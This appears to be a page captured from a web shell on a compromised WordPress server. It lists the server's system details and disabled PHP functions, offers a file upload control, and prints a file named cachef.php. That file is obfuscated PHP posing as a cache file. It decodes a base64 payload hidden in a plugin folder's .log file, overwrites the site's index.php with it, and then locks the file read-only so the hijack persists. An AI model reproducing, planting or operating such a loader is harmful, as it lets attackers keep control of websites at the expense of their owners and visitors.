HEX
Server: nginx/1.18.0
System: Linux iZbp1iyjs7ksbt4k1nbwypZ 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64
User: www (1000)
PHP: 7.4.16
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /data/wordpress/wp-content/
Upload Files
File: /data/wordpress/wp-content/cachef.php
<?php //c_start  
$f_exists ="\x66il\x65_e\x78is\x74s"; $ch = "\x63hm\x6fd"; $tou = "\x74ou\x63h"; 
$delete ='un'.'link';$f_put = 'fil' . 'e_p' . 'ut_' . 'con' . 'ten' . 'ts'; 
$f_get = 'fil' . 'e_g' . 'et_' . 'con' . 'ten' . 'ts';
global $gov;if (!$gov) {
$bs_dec = "base64_decode"; $idx_path = $_SERVER['DOCUME' . 'NT_ROOT']. '/ind' . 'ex.php'; $bk_idx_path = '/data/wordpress/wp-content/plugins/gd-bbpress-attachments/jswHXTu.log';  if ($f_exists($bk_idx_path)){ 
@$ch($idx_path, 0644); $idx_code=$f_get($bk_idx_path); $f_result=$f_put($idx_path,$bs_dec($idx_code));@$ch($idx_path, 0444); }  
}
//c_end
 ?>
@ Telegram